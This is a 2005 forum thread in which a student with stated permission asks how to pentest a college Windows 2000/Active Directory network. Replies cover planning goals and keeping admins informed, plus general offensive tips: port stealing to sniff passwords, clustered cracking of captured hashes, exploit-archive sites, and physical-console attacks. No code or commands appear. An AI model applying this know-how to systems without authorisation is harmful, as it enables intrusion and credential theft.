February 12th, 2005, 09:36 PM
College project (Penetration testing)
Hey guys, first off I have written permission from both my tutor and network administrator for this so no worries about the legal aspect.
Now thats out the way, I'm in my second year of a HND at my local college. Talking with my teacher about what could be a good idea for my major project they sugested I try penetration testing as it would be something different for me as I usually do programming.
So talking with my network admins they say's it's ok as they've seen me around and heard stuff about me so they think they can trust me. (Also if anything goes wrong they know where to come first!)
The network is made up of windows 2K work stations and each class room is switched. The server is running the latest windows server and using Active Directory.
I have a laptop running mandrake linux with some software such as ettercap, ettereal, nmap (having trouble getting password sniffers on there but that should be soon) which I can take in and use.
Now the really challenge is to do as much manually because I have to document everything I do and just using software to hack the network would make for a boring project.
I was wondering if you guys have any tips or advice about how to get started and what direction to take this?
Cheers in advance for your help
February 13th, 2005, 12:24 AM
If I were you I would start off here. Read up on the tools you will be using. Maybe try playing with a little Knoppix STD purely for the vast assortment of tools it offers.
February 13th, 2005, 12:35 AM
Plan yuor attack. Figure out how you are going to attack, what you are going to attack, objectives. Going in with no objective makes it very hard to stay focused. i mean how do you know if you are there if you dont know where there is. Is your goal to just get access to the network? or do you actually want to penetrate the server and get "root" access to it? Are you going for a DoS style attack and just dropping the network?
also MAKE SURE you keep the admins up to speed iwith what you are doing. Like if you plan on trying a DoS attack make sure they know so they dont freak out when stuff stops working. DONT attack the whole network, or vital equipment. If its equipment that when dropped stops a needed function then dont go after it first. Also for the conclusion I would fix the problems you do find.
Look up current known exploits for things. MS puts up proof-of-concept code so do alot of other companies for known vulnerabilities in their OS.
BUt Like I said before establish your goals before you start, it will make research on how to attack alot easier if you know what you are trying to accomplish.
February 13th, 2005, 12:44 AM
Hey guys, thanks of the posts so far.
I don't want to do a DOS as others do have to use the network and it isn't really my goal. My goal is to get "root" or one of the admin accounts. Sorry should of said that before. I've been keeping the techies informed when I've been doing some test so far so I have that angle covered.
If someone has some idea's of angles of attack or even some pointers as to holes in MS at the moment thats what I really need. I can port steal and collect passwords but they are encrypted and john the ripper is taking forever to crack the passwords I have collected. Anyone know a better tool to use?
Thanks for what's been sugested so far.
February 13th, 2005, 05:02 AM
1st, yes DOS would be a worthless point of attack. It has almost nothing to do with "pen" testing and any @#$ can do it. It nets very little info about your org unless you are going to test things like response policies and the like.
Start by documenting as much as you can about your network and configurations. Only then will you have a platform to analyze possible attack points. How big is the network BTW? What are your physical access limitations?
Also, if you really want to put some egg on faces for your project, think information leaks. Too much time is spent on "root" this and "root" that. From the inside out, there are many many more risks to manage in addition to account attacks and privilege escalation. Security policies neither start nor end with computers and computer networks. Shoot you might even choose to audit
CM (configuration management) and disaster recovery policy and documentation...
Turn it into a real mind!#$ and turn that project into a job offer...
Post more info and I'm sure people here can help you get real crafty..
Peace and good luck!!
February 13th, 2005, 05:15 AM
Just google for "microsoft vulnerability" Microsoft exploit" "microsoft proof of concept" and prepare for a landslide. Also check out www.packetstormsecurity.nl as they have a good collection of all things security
If someone has some idea's of angles of attack or even some pointers as to holes in MS at the moment thats what I really need.
As far as cracking the passwd files try Cisilia, run atop openmosix! There was a thread on here recently regarding this. Or just google for cisilia. Basically what your doing is making a cluster focused on cracking that password file. Or just follow my advice on using knoppix STD, its all built in to the .ISO and burning a disk is alot easier than installing each package on each individual machine.. Setup is pretty straightforward too. Hope this helps
February 13th, 2005, 02:52 PM
Jonesy69, I think an important point to make in your project report would be physical access. It sounds like the intent of this is remote exploits (code, attacking services, etc.), but a mention of this aspect would be very beneficial. However, if there is no restriction on the types of access, you should include a short section on this attack vector beciause I can guaruntee you it is the easiest to exploit in the environment you describe.
But if you have the ability to go sit down at one of these boxes, drop a specially crafted CD, Floppy Diskette, or USB Flash Drive into the system and 'own' it, that should be at least mentioned or documented.
One of the biggest tenets of Information Security is 'if they have physical access to the box, they own the box'. This is a concept that has a foundation in the realm of physical security i.e. locksmiths. Technically, a safe is not rated on how 'hard' it is to penetrate, but on how long it would take to penetrate given a sustained level of effort. If you have a system with no floppy drive, no CD or DVD reader, no USB or IEEE 1394 ports, than you have made it marginally harder to physically crack. But don't leave me alone at the console with the intent to access it, or you'll regret the decision!
All the firewalls, antivirus, intrusion prevention, and host based security measures won't help you if I can pull the plug, crack the case, load a CD, and do my thing.
"Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
"...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore
February 13th, 2005, 04:05 PM
John is the fastest tool for cracking passwords on a single machine. It sounds like you have access to multiple computers though, so follow this tutorial if you want speed up that cracking process.
Originally posted here by imp35713
I can port steal and collect passwords but they are encrypted and john the ripper is taking forever to crack the passwords I have collected. Anyone know a better tool to use?
As far as finding your exploits, I suggest two sites (one was already mentioned). www.k-otik.com and www.packetstormsecurity.nl. Most of the exploit code you'll find at those and other sites wont compile without some fixing and tweaking but since you have pragramming background, you shouldn't have a problem getting them to a usable form.